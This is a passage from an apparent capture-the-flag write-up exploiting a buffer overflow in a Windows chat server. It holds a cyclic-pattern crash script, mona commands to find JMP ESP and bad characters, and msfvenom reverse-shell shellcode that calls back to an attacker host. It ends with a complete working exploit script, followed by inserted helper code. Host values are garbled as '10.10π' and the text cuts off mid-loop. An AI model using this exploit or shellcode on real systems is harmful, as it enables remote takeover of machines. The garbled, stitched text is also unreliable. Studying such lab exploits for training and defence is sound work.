payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2
Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc
9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk"

r = remote(HOST, PORT)
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print("[+] SENDING USERNAME")
r.send(payload.encode() + b"\r\n")   # the pattern is plain ASCII, so encode() is lossless
r.clean()
print("[+] SENDING CHAT")
r.send(b"Ok\r\n")
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
if r.recvline(timeout=4) == b"":
    print("[!] KO CHAT")   # expected: EIP now holds 4 bytes of the pattern, read it in the debugger
r.close()
The server crashes as expected, with EIP = 46307746. At this point I realized that I did not need a script for this because I could have sent the pattern with nc, but this is what I did.
Feeding that EIP value to msf-pattern_offset gives an exact match at offset 4560:
msf-pattern_offset -l 5000 -q 46307746
[*] Exact match at offset 4560
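The pattern trick, as an added example that is not code from the writeup: a pure-Python equivalent of msf-pattern_create and msf-pattern_offset, so the offset can be recovered from the debugger's EIP value without the Metasploit tools. The value 46307746 used below is the one from the crash above; the function also accepts it as the hex string the debugger prints:

```python
import string
import struct


def pattern_create(length):
    """Same sequence msf-pattern_create emits: Aa0Aa1...Aa9Ab0...Zz9, in which every
    4-byte window is unique for the first 20280 bytes."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("length %d exceeds the 20280-byte unique pattern" % length)


def pattern_offset(length, eip):
    """Offset in the pattern of the 4 bytes that landed in EIP, or -1 if absent.
    `eip` is an int or the hex string shown by the debugger (e.g. "46307746"); the
    register holds the bytes little-endian, so it is packed with "<I" before searching."""
    if isinstance(eip, str):
        eip = int(eip, 16)
    return pattern_create(length).find(struct.pack("<I", eip))


if __name__ == "__main__":
    print(pattern_offset(5000, "46307746"))   # 4560, matching msf-pattern_offset
```

Because uppercase letters only ever occupy the first position of a triple, the four bytes Fw0F (0x46 0x77 0x30 0x46, which is 0x46307746 read little-endian) can only sit at one offset, which is why a single crash pins the distance to the saved return address.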
The script evolves to fill the 4560-byte offset with As followed by "BBBB" (0x42424242 in ASCII), which should land exactly in EIP:
#!/usr/bin/env python3
from pwn import *

HOST = "10.10π"
PORT = 9999
offset = 4560

# 4560 bytes of padding reach the saved return address; "BBBB" should land in EIP
fuzz = b"A" * offset

r = remote(HOST, PORT)
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print("[+] SENDING USERNAME")
r.send(fuzz + b"BBBB" + b"\r\n")
r.clean()
print("[+] SENDING CHAT")
r.send(b"Ok\r\n")
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
if r.recvline(timeout=4) == b"":
    print("[!] KO CHAT")   # expected: EIP should read 0x42424242 in the debugger
r.close()
EIP is overwritten with 42424242, so the offset is confirmed.
Now I need the opcode bytes for a JMP ESP instruction, which will redirect execution into the data that follows the overwritten return address:
/usr/bin/msf-nasm_shell
nasm > jmp esp
00000000 FFE4 jmp esp
Using mona inside Immunity Debugger to find an address that contains that instruction. First set mona's working folder (%p expands to the debugged process name, so in my case it becomes C:\Users\admin\Desktop\chatserver), then list the loaded modules and search for the opcode bytes:
!mona config -set workingfolder C:\Users\admin\Desktop\%p
!mona modules
!mona find -s "\xff\xe4"
In the generated find.txt (under C:\Users\admin\Desktop\chatserver) there are several hits inside essfunc.dll. That module is the right choice because it is loaded with ASLR, Rebase and SafeSEH all False, so the address is the same on every run, and an address such as 0x62501533 contains none of the bad characters:
0x625014df : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x625014eb : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x625014f7 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x62501503 : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x6250150f : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x6250151b : "\xff\xe4" | asciiprint,ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x62501527 : "\xff\xe4" | asciiprint,ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x62501533 : "\xff\xe4" | asciiprint,ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
Converted to little-endian byte order (x86 stores the least significant byte first):
62501533 -> “\x33\x15\x50\x62”
The next step is finding the bad characters: bytes that the server mangles or that stop the copy before the shellcode is complete. I used mona to generate a byte array of every value except \x00 (a NUL terminates C strings, so it is excluded up front) and modified the script to send the array right after the EIP overwrite:
!mona bytearray -cpb \x00
#!/usr/bin/env python3
from pwn import *

HOST = "10.10π"
PORT = 9999
offset = 4560
fuzz = b"A" * offset

# Same contents as mona's bytearray.bin with \x00 excluded: every byte 0x01..0xff in order.
# It sits right after the EIP overwrite, so at the crash ESP points to its first byte.
badchars = bytes(range(0x01, 0x100))

r = remote(HOST, PORT)
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print("[+] SENDING USERNAME")
r.send(fuzz + b"BBBB" + badchars + b"\r\n")
r.clean()
print("[+] SENDING CHAT")
r.send(b"Ok\r\n")
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
if r.recvline(timeout=4) == b"":
    print("[!] KO CHAT")   # expected: now compare the array at ESP against bytearray.bin
r.close()
Then compare what landed on the stack with the file. The -a argument is the address where the array starts in memory, which is the value of ESP at the crash:
!mona compare -a 017DEEC0 -f C:\Users\admin\Desktop\chatserver\bytearray.bin
Mona reported the array unmodified on the first try, so the only bad character is \x00.
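An added example (not the author's code) that reproduces what mona's bytearray and compare commands do, offline, and automates the usual loop of excluding each newly found bad byte and re-testing until the array survives untouched. The simulated_copy function is a constructed stand-in for a server that stops copying at a line feed and mangles \x0d; on Brainstorm the real server only breaks on \x00, so against it the loop finishes on the first round:

```python
def bytearray_without(excluded=b"\x00"):
    """Equivalent of `!mona bytearray -cpb "\\x00"`: every byte value except the excluded ones."""
    return bytes(b for b in range(256) if b not in excluded)


def compare_bytearray(sent, in_memory):
    """Equivalent of `!mona compare`: check the array as it landed on the stack (a dump
    starting at the address given to -a) against what was sent.
    Returns (status, bad_bytes) with status 'unmodified', 'corrupted' or 'truncated'."""
    if in_memory[:len(sent)] == sent:
        return "unmodified", []
    n = min(len(sent), len(in_memory))
    for i in range(n):
        if sent[i] != in_memory[i]:
            # Only the first mismatch is trustworthy: a mangled byte may also shift or
            # replace everything after it, so exclude it and send the array again.
            return "corrupted", [sent[i]]
    # Every byte present matches but the copy stopped early: the next byte ended the copy.
    return "truncated", [sent[n]]


def find_badchars(probe, initial=b"\x00"):
    """Run the exclude-and-retest loop until the array survives unmodified.
    `probe` sends an array and returns the bytes found at ESP afterwards."""
    bad = bytes(initial)
    while True:
        arr = bytearray_without(bad)
        status, found = compare_bytearray(arr, probe(arr))
        if status == "unmodified":
            return bad
        bad += bytes(found)


def simulated_copy(data):
    """Constructed stand-in for a vulnerable server (not chatserver.exe): it overwrites
    0x0d with NUL and stops copying at the first 0x0a, so both are bad characters."""
    data = data.replace(b"\x0d", b"\x00")
    cut = data.find(b"\x0a")
    return data[:cut] if cut != -1 else data


if __name__ == "__main__":
    print(find_badchars(simulated_copy))   # b'\x00\n\r'
```

With a real target, `probe` is the network send from the script above followed by a memory read at ESP from the debugger; the important habit is excluding only the first bad byte per round, since everything after it may just be collateral damage.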
Generate the shellcode with msfvenom, excluding that bad character. EXITFUNC=thread makes the payload terminate only its own thread when the shell exits, rather than the whole process:
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10π LPORT=4433 -f c -v shellcode -b '\x00' EXITFUNC=thread
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes
unsigned char shellcode[] =
"\xda\xce\xd9\x74\x24\xf4\xba\x30\x2e\x3b\xeb\x5b\x33\xc9\xb1"
"\x52\x31\x53\x17\x03\x53\x17\x83\xdb\xd2\xd9\x1e\xe7\xc3\x9c"
"\xe1\x17\x14\xc1\x68\xf2\x25\xc1\x0f\x77\x15\xf1\x44\xd5\x9a"
"\x7a\x08\xcd\x29\x0e\x85\xe2\x9a\xa5\xf3\xcd\x1b\x95\xc0\x4c"
"\x98\xe4\x14\xae\xa1\x26\x69\xaf\xe6\x5b\x80\xfd\xbf\x10\x37"
"\x11\xcb\x6d\x84\x9a\x87\x60\x8c\x7f\x5f\x82\xbd\x2e\xeb\xdd"
"\x1d\xd1\x38\x56\x14\xc9\x5d\x53\xee\x62\x95\x2f\xf1\xa2\xe7"
"\xd0\x5e\x8b\xc7\x22\x9e\xcc\xe0\xdc\xd5\x24\x13\x60\xee\xf3"
"\x69\xbe\x7b\xe7\xca\x35\xdb\xc3\xeb\x9a\xba\x80\xe0\x57\xc8"
"\xce\xe4\x66\x1d\x65\x10\xe2\xa0\xa9\x90\xb0\x86\x6d\xf8\x63"
"\xa6\x34\xa4\xc2\xd7\x26\x07\xba\x7d\x2d\xaa\xaf\x0f\x6c\xa3"
"\x1c\x22\x8e\x33\x0b\x35\xfd\x01\x94\xed\x69\x2a\x5d\x28\x6e"
"\x4d\x74\x8c\xe0\xb0\x77\xed\x29\x77\x23\xbd\x41\x5e\x4c\x56"
"\x91\x5f\x99\xf9\xc1\xcf\x72\xba\xb1\xaf\x22\x52\xdb\x3f\x1c"
"\x42\xe4\x95\x35\xe9\x1f\x7e\x30\xe7\x1b\x0a\x2c\xf5\x23\xe3"
"\xfd\x70\xc5\x69\xee\xd4\x5e\x06\x97\x7c\x14\xb7\x58\xab\x51"
"\xf7\xd3\x58\xa6\xb6\x13\x14\xb4\x2f\xd4\x63\xe6\xe6\xeb\x59"
"\x8e\x65\x79\x06\x4e\xe3\x62\x91\x19\xa4\x55\xe8\xcf\x58\xcf"
"\x42\xed\xa0\x89\xad\xb5\x7e\x6a\x33\x34\xf2\xd6\x17\x26\xca"
"\xd7\x13\x12\x82\x81\xcd\xcc\x64\x78\xbc\xa6\x3e\xd7\x16\x2e"
"\xc6\x1b\xa9\x28\xc7\x71\x5f\xd4\x76\x2c\x26\xeb\xb7\xb8\xae"
"\x94\xa5\x58\x50\x4f\x6e\x78\xb3\x45\x9b\x11\x6a\x0c\x26\x7c"
"\x8d\xfb\x65\x79\x0e\x09\x16\x7e\x0e\x78\x13\x3a\x88\x91\x69"
"\x53\x7d\x95\xde\x54\x54";
The final script:
#!/usr/bin/env python3
from pwn import *

HOST = "10.10π"
PORT = 9999
offset = 4560
shellcode = ("\xda\xce\xd9\x74\x24\xf4\xba\x30\x2e\x3b\xeb\x5b\x33\xc9\xb1"
"\x52\x31\x53\x17\x03\x53\x17\x83\xdb\xd2\xd9\x1e\xe7\xc3\x9c"
"\xe1\x17\x14\xc1\x68\xf2\x25\xc1\x0f\x77\x15\xf1\x44\xd5\x9a"
"\x7a\x08\xcd\x29\x0e\x85\xe2\x9a\xa5\xf3\xcd\x1b\x95\xc0\x4c"
"\x98\xe4\x14\xae\xa1\x26\x69\xaf\xe6\x5b\x80\xfd\xbf\x10\x37"
"\x11\xcb\x6d\x84\x9a\x87\x60\x8c\x7f\x5f\x82\xbd\x2e\xeb\xdd"
"\x1d\xd1\x38\x56\x14\xc9\x5d\x53\xee\x62\x95\x2f\xf1\xa2\xe7"
"\xd0\x5e\x8b\xc7\x22\x9e\xcc\xe0\xdc\xd5\x24\x13\x60\xee\xf3"
"\x69\xbe\x7b\xe7\xca\x35\xdb\xc3\xeb\x9a\xba\x80\xe0\x57\xc8"
"\xce\xe4\x66\x1d\x65\x10\xe2\xa0\xa9\x90\xb0\x86\x6d\xf8\x63"
"\xa6\x34\xa4\xc2\xd7\x26\x07\xba\x7d\x2d\xaa\xaf\x0f\x6c\xa3"
"\x1c\x22\x8e\x33\x0b\x35\xfd\x01\x94\xed\x69\x2a\x5d\x28\x6e"
"\x4d\x74\x8c\xe0\xb0\x77\xed\x29\x77\x23\xbd\x41\x5e\x4c\x56"
"\x91\x5f\x99\xf9\xc1\xcf\x72\xba\xb1\xaf\x22\x52\xdb\x3f\x1c"
"\x42\xe4\x95\x35\xe9\x1f\x7e\x30\xe7\x1b\x0a\x2c\xf5\x23\xe3"
"\xfd\x70\xc5\x69\xee\xd4\x5e\x06\x97\x7c\x14\xb7\x58\xab\x51"
"\xf7\xd3\x58\xa6\xb6\x13\x14\xb4\x2f\xd4\x63\xe6\xe6\xeb\x59"
"\x8e\x65\x79\x06\x4e\xe3\x62\x91\x19\xa4\x55\xe8\xcf\x58\xcf"
"\x42\xed\xa0\x89\xad\xb5\x7e\x6a\x33\x34\xf2\xd6\x17\x26\xca"
"\xd7\x13\x12\x82\x81\xcd\xcc\x64\x78\xbc\xa6\x3e\xd7\x16\x2e"
"\xc6\x1b\xa9\x28\xc7\x71\x5f\xd4\x76\x2c\x26\xeb\xb7\xb8\xae"
"\x94\xa5\x58\x50\x4f\x6e\x78\xb3\x45\x9b\x11\x6a\x0c\x26\x7c"
"\x8d\xfb\x65\x79\x0e\x09\x16\x7e\x0e\x78\x13\x3a\x88\x91\x69"
"\x53\x7d\x95\xde\x54\x54")
jmp_esp = b"\x33\x15\x50\x62"   # 0x62501533 (JMP ESP in essfunc.dll), little-endian
nops = b"\x90" * 20             # small NOP sled in front of the encoder's decoder stub
# msfvenom's C output is a str of code points 0x00..0xff; latin-1 maps each one to a single byte
payload = b"A" * offset + jmp_esp + nops + shellcode.encode("latin-1")

r = remote(HOST, PORT)
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print("[+] SENDING USERNAME")
r.send(payload + b"\r\n")
r.clean()
print("[+] SENDING CHAT")
r.send(b"Ok\r\n")
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
if r.recvline(timeout=4) == b"":
    print("[!] KO CHAT")   # expected: the process is now running the reverse shell
r.close()
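The JMP ESP selection and the final payload layout above, as one added example that is not code from the writeup: a search for the FF E4 opcode over a module's executable bytes that rejects any address whose little-endian encoding contains a bad character (the check mona's listing leaves to the reader), plus a builder that assembles padding, return address, NOP sled and shellcode and refuses to emit a buffer containing a bad byte. The code blob, its image base 0x62500000 and the placeholder shellcode are constructed for the example; only \x00 is treated as bad because the mona compare above showed this server accepts \x0a and \x0d:

```python
import struct

JMP_ESP = b"\xff\xe4"        # opcode for `jmp esp` (msf-nasm_shell output above)
SAMPLE_BASE = 0x62500000      # assumed image base for the constructed blob below


def p32(addr):
    """Pack a 32-bit address little-endian, as it must appear in the buffer."""
    return struct.pack("<I", addr)


def find_jmp_esp(code, base, badchars=b"\x00"):
    """Addresses of every JMP ESP in `code` (executable bytes of a module loaded at
    `base`) whose packed form contains none of `badchars`. Mona searches every
    loaded module this way; here the search runs over raw bytes."""
    hits = []
    pos = code.find(JMP_ESP)
    while pos != -1:
        addr = base + pos
        if not any(b in badchars for b in p32(addr)):
            hits.append(addr)
        pos = code.find(JMP_ESP, pos + 1)
    return hits


def check_badchars(data, badchars=b"\x00"):
    """Sorted list of the bad byte values that occur in `data` (empty if clean)."""
    return sorted({b for b in data if b in badchars})


def build_payload(offset, ret_addr, shellcode, nop_len=20, badchars=b"\x00"):
    """junk | return address | NOP sled | shellcode, then the CRLF the chat expects.
    Raises if anything before the terminator contains a bad byte."""
    body = b"A" * offset + p32(ret_addr) + b"\x90" * nop_len + shellcode
    bad = check_badchars(body, badchars)
    if bad:
        raise ValueError("payload contains bad bytes: " + " ".join("\\x%02x" % b for b in bad))
    return body + b"\r\n"


def build_sample_code():
    """Constructed module image (not essfunc.dll): int3 filler with JMP ESP at three
    offsets, one of which (0x0a00) gives an address containing a NUL and must be rejected."""
    code = bytearray(b"\xcc" * 0x1600)
    for off in (0x0a00, 0x14df, 0x1533):
        code[off:off + 2] = JMP_ESP
    return bytes(code)


SAMPLE_CODE = build_sample_code()

if __name__ == "__main__":
    for addr in find_jmp_esp(SAMPLE_CODE, SAMPLE_BASE):
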